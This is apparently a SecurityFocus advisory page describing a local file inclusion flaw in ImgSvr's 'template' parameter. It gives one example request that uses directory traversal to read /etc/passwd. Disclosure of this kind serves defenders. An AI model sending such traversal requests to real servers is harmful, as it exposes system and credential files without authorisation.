info
discussion
exploit
solution
references
ImgSvr Template Parameter Local File Include Vulnerability
Attackers may exploit this issue through a browser.
An example URI has been provided:
GET /?template=../../../../../../../../../../etc/passwd HTTP/1.0
Privacy Statement
Copyright 2010, SecurityFocus